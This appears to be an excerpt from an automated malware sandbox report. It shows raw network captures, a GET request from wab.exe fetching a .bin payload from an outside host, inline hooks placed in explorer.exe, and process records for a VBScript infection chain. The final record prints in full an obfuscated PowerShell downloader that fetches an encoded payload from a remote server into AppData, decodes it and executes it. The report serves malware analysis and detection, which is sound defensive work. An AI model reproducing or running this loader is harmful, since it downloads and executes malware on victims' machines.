                2024-07-03 05:50:21 UTC8000INData Raw: 5a 35 46 51 6b 47 6b 52 4f 6b 56 2b 62 6e 55 6b 31 69 70 71 46 64 39 46 6c 4d 45 78 55 58 54 48 44 30 61 61 30 47 62 65 53 38 6a 68 4d 6e 63 63 42 6c 41 7a 74 34 46 53 6c 74 41 42 61 49 52 54 48 4a 36 49 79 38 68 67 44 74 51 43 51 34 66 68 43 37 57 31 56 77 36 6c 6c 52 54 4a 51 47 54 6a 48 74 47 55 53 77 36 53 43 4d 51 74 53 70 54 6a 79 47 43 52 57 4e 42 66 67 73 4b 56 53 57 54 6a 68 70 4a 59 78 43 31 41 59 52 46 55 6f 5a 54 44 4d 58 4f 54 46 50 43 37 6d 38 4d 47 42 58 65 6f 72 66 4e 4d 7a 77 37 64 63 34 36 55 57 49 54 67 39 30 57 57 30 41 31 6a 6f 38 38 4c 52 5a 63 78 4b 45 41 4f 31 43 49 44 75 76 51 44 51 5a 54 43 6c 56 4c 36 31 41 72 6e 77 35 6c 66 31 41 77 6b 61 55 46 45 55 41 6f 77 34 73 6b 4c 6c 51 59 33 54 36 66 4f 78 39 2f 57 4d 2b 7a 4c 68 6a 56
                Data Ascii: Z5FQkGkROkV+bnUk1ipqFd9FlMExUXTHD0aa0GbeS8jhMnccBlAzt4FSltABaIRTHJ6Iy8hgDtQCQ4fhC7W1Vw6llRTJQGTjHtGUSw6SCMQtSpTjyGCRWNBfgsKVSWTjhpJYxC1AYRFUoZTDMXOTFPC7m8MGBXeorfNMzw7dc46UWITg90WW0A1jo88LRZcxKEAO1CIDuvQDQZTClVL61Arnw5lf1AwkaUFEUAow4skLlQY3T6fOx9/WM+zLhjV
                2024-07-03 05:50:21 UTC8000INData Raw: 56 68 79 61 42 2b 77 46 63 38 30 4c 37 77 75 33 71 66 46 33 79 53 6c 78 41 4d 73 50 52 41 77 6b 42 61 47 38 31 62 33 7a 68 7a 6b 49 67 67 44 59 64 44 51 4f 31 47 6c 43 4d 76 44 63 49 4c 41 67 49 55 4a 52 58 7a 45 6c 43 74 41 42 52 6d 30 66 43 47 2b 36 39 35 74 4e 6c 4d 45 59 43 41 77 6b 51 46 6d 63 48 75 65 72 76 78 67 62 33 35 41 4c 36 79 58 72 54 52 67 49 44 43 51 4a 51 56 35 48 54 55 74 35 57 51 69 72 57 52 45 4c 6a 4e 4c 54 64 5a 77 4f 31 45 6c 43 6e 44 75 54 6d 59 62 45 70 36 30 49 48 78 78 5a 6e 38 50 4b 6f 41 6c 5a 47 45 4f 51 43 62 4b 4f 31 50 79 6a 4d 67 2b 6a 69 4e 43 57 79 6c 79 76 69 64 2b 5a 39 31 58 59 74 72 33 6c 33 46 2f 37 52 4f 55 59 48 45 64 34 58 54 74 36 78 38 57 63 64 75 6b 56 51 54 32 61 56 57 34 44 33 52 70 42 6e 4d 4d 4d 55 72 2f
                Data Ascii: VhyaB+wFc80L7wu3qfF3ySlxAMsPRAwkBaG81b3zhzkIggDYdDQO1GlCMvDcILAgIUJRXzElCtABRm0fCG+695tNlMEYCAwkQFmcHuervxgb35AL6yXrTRgIDCQJQV5HTUt5WQirWRELjNLTdZwO1ElCnDuTmYbEp60IHxxZn8PKoAlZGEOQCbKO1PyjMg+jiNCWylyvid+Z91XYtr3l3F/7ROUYHEd4XTt6x8WcdukVQT2aVW4D3RpBnMMMUr/


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.749707178.128.157.1504437976C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                2024-07-03 05:50:59 UTC184OUTGET /xdKCjAMEQDWiUiQMPQ170.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: larryfrank.cpa
                Cache-Control: no-cache
                2024-07-03 05:50:59 UTC289INHTTP/1.1 200 OK
                Date: Wed, 03 Jul 2024 05:50:59 GMT
                Server: Apache
                Last-Modified: Tue, 02 Jul 2024 09:19:15 GMT
                Accept-Ranges: bytes
                Content-Length: 189504
                Cache-Control: max-age=0
                Expires: Wed, 03 Jul 2024 05:50:59 GMT
                Connection: close
                Content-Type: application/octet-stream
                2024-07-03 05:50:59 UTC7903INData Raw: 9e 95 f6 33 c9 0e 27 61 d0 56 17 36 77 29 87 3f da 5d 6c 94 e3 9f 38 af 08 dc f8 89 bb 4a 20 36 b8 0d fd 74 c7 20 a0 47 1f 55 02 01 cb 18 bd 1f 07 87 93 d6 32 6f 38 d0 8b b5 98 7a a2 af a2 03 95 8a d7 e8 0c 88 d6 bf c2 e7 e5 78 69 16 dd 04 1f f8 d9 d2 03 21 08 81 7c e5 ad f1 b0 5e 99 f4 37 61 fb 7d 03 55 22 a6 b5 36 28 bb de 45 75 f0 90 93 33 9c a3 43 7b 07 53 17 8a 13 31 4e ab 13 1e 15 e0 5a 77 0a 73 f8 de 98 d8 27 13 7f 58 e9 dc d2 56 aa 39 50 a1 ee 22 8f 12 3c 11 6f 23 80 d7 1c f1 5c 84 f4 72 73 a0 f5 44 40 bf 9c 69 81 78 ea 0f 72 ce 61 98 e3 0f f7 b8 fd 89 dd 81 a6 41 40 a7 30 f6 60 57 5c 60 91 a0 64 c4 8e 6e e1 cb 92 2d eb 90 91 a3 09 4f 42 14 e2 a6 e1 11 cc 59 b6 c0 b9 34 44 27 0e 85 86 36 c8 ab 8e 71 04 a6 69 06 67 39 e5 49 6a 9d 1a 85 82 5e c7 52
                Data Ascii: 3'aV6w)?]l8J 6t GU2o8zxi!|^7a}U"6(Eu3C{S1NZws'XV9P"<o#\rsD@ixraA@0`W\`dn-OBY4D'6qig9Ij^R
                2024-07-03 05:50:59 UTC8000INData Raw: 20 52 f0 9d fb 16 19 5a 79 f8 c0 cb d7 bc a7 7e f7 c4 5e ea 59 d6 aa 81 ab 10 c1 d5 08 47 7b 02 56 8c 61 6f 90 51 25 e6 78 bb 6f 80 cb 43 ed d5 ec f7 c8 4f e2 00 95 bc 38 3b 4f 44 00 d2 65 36 bb f2 4d 53 49 c4 c4 6f 6c 30 70 52 d3 ab 5f bb b9 71 db 6a ae 83 27 c7 1a b6 b2 d5 52 15 45 db 83 ac d8 74 c0 cc c3 42 6a d6 6c 9d d5 2d 6d 9a 00 0a 1a b4 b1 f0 af f3 5b b6 59 dc be f2 b8 25 0c 85 1a e6 a8 2a 70 02 68 6a e8 59 ae fa 57 e6 2a 5d 08 e8 a8 6d fb df 9e 7c 6d 2e c2 16 98 f7 41 07 f3 a9 95 27 f7 44 eb fe d1 25 c5 20 31 ca 15 8b 39 48 61 38 8f c5 b9 94 a7 7a 9b 5b a4 2b 7f 85 43 47 a4 8f 96 f3 92 cc a8 9e c6 0b 66 bd bf e2 af 51 58 3f e6 89 d7 60 e1 60 02 b4 8e ba 90 83 b9 9a 03 53 ce f8 c7 88 bb fd ba e3 44 b4 a6 68 c8 78 52 91 4c 89 71 96 78 f6 cf 9f d6
                Data Ascii: RZy~^YG{VaoQ%xoCO8;ODe6MSIol0pR_qj'REtBjl-m[Y%*phjYW*]m|m.A'D% 19Ha8z[+CGfQX?``SDhxRLqx
                2024-07-03 05:50:59 UTC8000INData Raw: 7b dc 69 bb 8a 8c 88 9d 72 c5 fd b8 e3 d6 c1 73 f0 90 b8 c5 ba d2 5b b9 75 17 9a 2a a8 ea 53 60 cd 3c 0c eb 30 78 bd b2 79 a4 e3 ca aa 44 15 f0 aa d5 98 bf 63 e8 12 0c ea 92 0e f8 b6 97 9b ae 81 95 d3 30 9e 2f db 76 7d 1b 38 e5 fd 90 2f da 99 69 5d 88 5a 31 3b d9 a5 e6 ff e7 5d 2e 48 2b 73 2f d0 76 aa 1c b4 b1 2d a1 e4 fb b6 8a 62 88 35 4e c3 5c 3d bd 58 cb 4e 4b 53 86 01 4b d1 40 26 b1 7e 73 1e a2 77 eb f8 00 40 75 51 e3 9c 43 57 00 34 06 f2 94 7b 62 fb 2f 53 fa 78 5e 82 30 70 12 03 34 8d 10 f0 88 b4 73 5e 2b 73 54 d1 e3 5d 44 1e fe 73 1a ce 3f fd d3 97 00 ca 0d 81 9f 28 19 27 31 23 60 23 87 eb d2 75 17 38 32 0c 57 20 de 42 c0 80 1a 7e 6b d4 11 32 21 1e fc c8 a6 95 84 20 49 1b 50 d7 2f 0d f5 ef df bf d3 c2 89 ae bb 43 83 45 95 73 b4 2d 66 68 77 57 2e 74
                Data Ascii: {irs[u*S`<0xyDc0/v}8/i]Z1;].H+s/v-b5N\=XNKSK@&~sw@uQCW4{b/Sx^0p4s^+sT]Ds?('1#`#u82W B~k2! IP/CEs-fhwW.t
                2024-07-03 05:50:59 UTC8000INData Raw: 73 06 9c cb 40 77 f4 69 8a ce bf 27 67 2b 41 1b 07 61 48 f1 76 42 53 91 98 4f c8 4b b6 74 30 bd d8 ad 34 08 1e 6e d3 3c 73 65 6e 47 06 06 fa ca 06 cd 87 aa 55 e3 5d de 08 f1 71 49 2d ca fe 7d 31 b1 33 be 37 cf 51 f1 4d f3 b9 1b aa 72 66 c6 8d 6e 85 c8 54 0d 18 87 88 f4 8d 89 5c a2 a4 40 ea 79 45 e9 46 7c 24 22 a7 aa 2b 6f f4 ff 15 44 46 28 ed 0d 76 f9 a4 84 93 89 8d 5b b4 42 1a ab 51 c5 19 f6 1a 61 93 80 25 63 58 68 af 77 85 2e 04 8d 18 66 49 13 b7 1c 18 a5 1c f7 d2 9a 3a f4 92 fa 74 2b ea ea 2d 0f de cc 9f b5 e8 d3 06 9d 6e 95 a4 3d 42 09 2c 07 76 ee 2a a6 ad 66 db 93 9e a5 25 8c 21 c9 2b 0d ac 7f 3e 6c 0d 4d 1f a7 e4 8c 6a 18 28 89 a4 f6 6a af ef 90 44 8e 54 f1 33 45 93 b0 26 ac c3 07 23 87 65 76 2e 54 66 be d0 63 2a e4 9d b5 2a 40 57 f7 1b 1f 5c 60 b1
                Data Ascii: s@wi'g+AaHvBSOKt04n<senGU]qI-}137QMrfnT\@yEF|$"+oDF(v[BQa%cXhw.fI:t+-n=B,v*f%!+>lMj(jDT3E&#ev.Tfc**@W\`
                2024-07-03 05:50:59 UTC8000INData Raw: 69 e5 01 82 da d8 5b 4f 03 1e 15 2c 9e b8 00 f0 f3 ad c5 ac 9a 5e 2e 32 f8 f7 01 84 45 c5 80 a1 76 81 9a b4 f1 2a 85 c5 89 88 b7 e2 9b 31 b7 1e 2f ee db bb f4 d0 34 ea c9 3b 61 85 cd fa 8f c5 45 14 cb ee 92 7a 7b 1b 22 28 c3 6a a2 4f 47 01 2d 37 8d 44 89 61 49 32 bd 80 f8 c1 3e 03 69 ea 7a 0e 3c ee fd 14 06 8f f9 d7 7d 97 8e cc 58 a1 66 5e 00 c4 7e d6 c3 fd 04 f7 6b 2c 60 e1 74 21 8b 5e a8 e6 e9 9f 76 21 a6 33 cb c7 03 3a 96 2d 7a d5 0f d5 b8 66 04 b1 81 b3 fc a4 b1 8f cf b2 de 0e a3 48 34 d3 0a 79 5a 27 e6 b3 91 c9 72 ad 05 79 85 e6 06 76 44 56 86 42 50 ab ca 6a a3 6b 3f a3 bb fd 22 7b 0b 2e 28 ea fc f0 c3 b8 a3 37 59 1c 45 2f 95 54 81 3c e0 61 04 62 9f b0 0c 0e a0 51 31 32 fc 6b 5b 8f d8 47 8a 98 73 31 67 b3 2c 9b 5a ae 00 a6 7e bf 2d ac 4d bb 6f 24 fb
                Data Ascii: i[O,^.2Ev*1/4;aEz{"(jOG-7DaI2>iz<}Xf^~k,`t!^v!3:-zfH4yZ'ryvDVBPjk?"{.(7YE/T<abQ12k[Gs1g,Z~-Mo$
                2024-07-03 05:50:59 UTC8000INData Raw: 91 ff f2 1f ac ad 74 59 1a 52 7d 33 79 7c a9 ec a1 78 bc 34 41 9d 91 c6 22 78 32 1c 36 ec 34 f7 1c e0 c9 c8 bf 7b 7d 4d 07 38 00 55 02 10 9f 15 a7 f0 9b 1a dc 50 14 52 43 48 a2 74 1f 74 8c ba ac 14 a4 29 03 f6 31 ab 59 bd 6f 12 79 bd c3 77 8c a3 a1 78 57 52 fc 5c 5b c6 18 28 b7 aa b4 3f b8 05 38 ae 1c 04 e7 0a 6e f1 80 72 05 6e fb cd d0 cd 83 97 17 37 aa 59 13 6e e3 3f 9f 63 2d 39 46 a0 7f ea a8 6b 32 1b f7 d6 c1 c3 7b f3 66 37 7e 4a 64 3f 83 d8 98 2f 39 68 c6 0f 75 33 56 4b 35 44 7a 61 90 3e 08 73 29 f0 90 e7 5f de 19 09 d9 e4 91 bc c8 ec 8b 59 1c ae ee 88 d6 57 ed a6 67 90 eb d3 11 04 1b e0 61 1a 5f 69 05 59 5e e6 a5 50 0a 93 5a 62 09 e6 e0 f8 84 f8 ca 02 63 35 48 ee 55 a9 23 7b e5 9b 65 5b a5 bc 84 f8 ac ff 97 fc f1 4e fd 9a 56 1a b2 90 9a be 7a b6 3b
                Data Ascii: tYR}3y|x4A"x264{}M8UPRCHtt)1YoywxWR\[(?8nrn7Yn?c-9Fk2{f7~Jd?/9hu3VK5Dza>s)_YWga_iY^PZbc5HU#{e[NVz;
                2024-07-03 05:50:59 UTC8000INData Raw: af 4a d9 01 de 0d 5b 69 e0 32 76 da 21 77 90 15 06 1a da d5 e2 01 4d bf c9 3c f9 39 f7 d1 ef 23 13 9c 2a eb 86 2f b9 65 25 0c ed df ec 6c 95 6c d4 f8 3c 47 89 dd 81 2d b7 44 2a 01 16 79 9e e5 8f 0c 43 1d 24 97 af 58 3f 92 08 30 0c 0d c5 39 cb 41 04 37 7f 7d 77 fc dd b5 d3 76 ef d8 41 dd d6 85 55 29 34 10 ff fb 93 68 06 e4 f9 e7 19 e7 0b 2a 93 82 5e 95 05 71 63 81 55 3f bb 2e 97 3c 09 2b b8 6c 84 de c8 dc 31 7e ce 52 5c c4 3e e7 d6 79 77 b8 88 a5 92 9f 1d 36 17 3c fa c8 17 d3 be 74 30 16 92 87 d8 3a 16 bf 87 37 89 c9 51 6a a9 ce 65 e9 38 86 be 4a 91 05 f4 7f bb 8e fe bf 20 87 2f 7d 32 81 f0 39 c3 27 93 4e 36 7e f9 cd b1 65 a4 00 f6 60 ef 09 54 78 66 69 0c 79 05 60 51 dd 17 e9 bc c3 d9 8f e6 51 e5 9b 0c a3 1d da 9b 4e 12 2d da b2 5b 02 da bd 8d 44 94 74 a6
                Data Ascii: J[i2v!wM<9#*/e%ll<G-D*yC$X?09A7}wvAU)4h*^qcU?.<+l1~R\>yw6<t0:7Qje8J /}29'N6~e`Txfiy`QQN-[Dt
                2024-07-03 05:50:59 UTC8000INData Raw: ad 16 78 ac 0c ec 1d 7d 6c a9 5a 95 97 08 67 e4 6d 4e 19 7e 4a 11 d2 b4 a5 fc f4 3a 9a 71 7b a2 32 23 93 75 01 a0 88 7f 47 07 6a 4f 25 29 ff 63 75 14 a9 d0 d1 d5 7e 89 5e 44 27 91 39 5b bc e4 c7 aa 0a 15 37 b9 f5 ba 5a 35 e8 56 8d 2e c4 c7 0f 76 5f 4b bf 7b 13 52 37 59 6a 50 47 f6 b4 b3 66 29 1e 63 8b c4 8f c2 7a ff 40 65 a7 ac 1a 22 e4 fd 5a 5b c0 90 23 3a 0c 28 4b 87 f2 81 a3 6b 77 f3 aa 1a fa 6c e2 6a 4b b5 aa d1 4e 67 e3 18 2b 01 b0 b0 41 26 da 0f 72 1c 62 77 8e 9d 5d 10 f8 57 e6 61 3f 6c 41 55 ca a0 87 7a ef 87 c0 fb 0f 87 2a 41 f7 f1 80 e4 fa 8d 12 f0 05 04 03 28 5c 04 d0 84 2f 1e 44 1e a9 4b 43 11 f3 e5 82 dd a0 22 a0 bd 0a 24 1a e7 bf 2e 57 bf ef 79 46 d3 1b b5 b7 2c c8 df 4b 12 1f 9a 6a 1d 4e 3c 05 c9 61 48 f6 8a 36 1c 44 54 c9 f2 77 3b 7d d6 2b
                Data Ascii: x}lZgmN~J:q{2#uGjO%)cu~^D'9[7Z5V.v_K{R7YjPGf)cz@e"Z[#:(KkwljKNg+A&rbw]Wa?lAUz*A(\/DKC"$.WyF,KjN<aH6DTw;}+
                2024-07-03 05:50:59 UTC8000INData Raw: a0 78 33 a3 d3 c2 89 a0 40 2b 78 b5 ee 31 df 2c eb a6 95 1a 7c 2d 09 d9 36 11 fc 3a ef fb 9e 4f 71 1c eb 34 10 0f 5a 64 7a 71 4d f6 c5 c8 b0 99 be db 88 ba f9 46 a5 bf 00 16 41 f7 6c 83 33 05 02 fe 83 b9 c0 3e 46 80 a5 d2 eb 0d 21 59 04 00 41 a9 46 b9 2c 39 e1 a6 53 37 cf 90 f3 4d f3 83 f3 ab d7 e2 ea ff 04 96 35 43 71 ef 4e da 1f 89 29 e6 b3 a6 d5 13 c0 96 9f 97 7c 9d f3 32 86 d4 c3 6d 24 14 5e b6 86 fa 07 2c 2e 38 06 57 16 cc 97 b8 06 c6 26 c4 29 8c 22 b4 02 e5 02 30 6a 59 38 71 1b fa 96 f9 72 64 21 99 9e a1 b0 88 05 69 85 33 df 5c 62 df 03 9d 5f 53 11 97 5e f1 fe 77 95 e8 b9 06 9d 73 99 26 71 5b 84 62 18 71 c1 4f 78 ad 66 58 bf 2a e3 e5 f8 a0 0d 2c a1 ac 7f 6d 84 2f 00 fa fa 24 17 65 a6 7f 27 27 13 37 3f e2 4b f8 13 df 14 38 0b 84 49 81 3f 18 f2 fc ab
                Data Ascii: x3@+x1,|-6:Oq4ZdzqMFAl3>F!YAF,9S7M5CqN)|2m$^,.8W&)"0jY8qrd!i3\b_S^ws&q[bqOxfX*,m/$e''7?K8I?
                2024-07-03 05:50:59 UTC8000INData Raw: 40 fe 86 b2 36 15 38 4d 68 ad 07 9b e2 7e 17 dc b9 c5 f7 e5 22 69 b3 bb 65 1e db ac da fc c3 26 55 59 ee 1f b1 49 44 43 63 9a 09 10 d9 4c b2 00 09 a2 cc f0 1b 79 bb cc 0d 9e ea 8c 38 fd 3a bb 60 f7 c5 e1 f6 d8 94 57 ee 13 52 13 fc 0e 7e 5a f8 d9 22 ee 85 46 59 d8 d7 7f fb 0b f3 d2 70 d0 2e c9 4f 2e c5 f0 37 1a 27 56 9e 18 33 07 77 7c 7f c0 8e 7f 2e 9d 36 44 2c 50 91 0e 73 06 28 2d 20 9c 3c d3 44 b6 10 1a 74 e6 80 25 21 ba f3 ef 61 0d 8e bc 1f 10 86 76 ba 79 90 06 25 d0 4a 20 96 51 b7 96 e5 f3 5b 73 3b 48 e8 ac b1 81 4a 19 2f f2 cc 3c e3 53 59 cb 45 5f ee 85 8b a5 a4 22 df 4e 49 49 4d 07 fd c4 e4 72 3b f4 28 ca db 51 ab ca 4e 6e 84 32 a2 94 87 6b 8a 26 5b 51 0d 78 75 d6 11 36 c5 c0 45 4b ce ee 54 0a 94 ee f4 e6 90 60 3d de ed 8f 2b 0e 16 29 be 01 99 22 46
                Data Ascii: @68Mh~"ie&UYIDCcLy8:`WR~Z"FYp.O.7'V3w|.6D,Ps(- <Dt%!avy%J Q[s;HJ/<SYE_"NIIMr;(QNn2k&[Qxu6EKT`=+)"F


                Code Manipulations

                Function NameHook TypeActive in Processes
                PeekMessageAINLINEexplorer.exe
                PeekMessageWINLINEexplorer.exe
                GetMessageWINLINEexplorer.exe
                GetMessageAINLINEexplorer.exe
                Function NameHook TypeNew Data
                PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEC
                PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEC
                GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEC
                GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEC

                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:01:49:58
                Start date:03/07/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
                Imagebase:0x7ff7fe330000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:01:50:00
                Start date:03/07/2024
                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Imagebase:0x7ff7fb730000
                File size:496'640 bytes
                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                Has elevated privileges:true
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:01:50:11
                Start date:03/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"
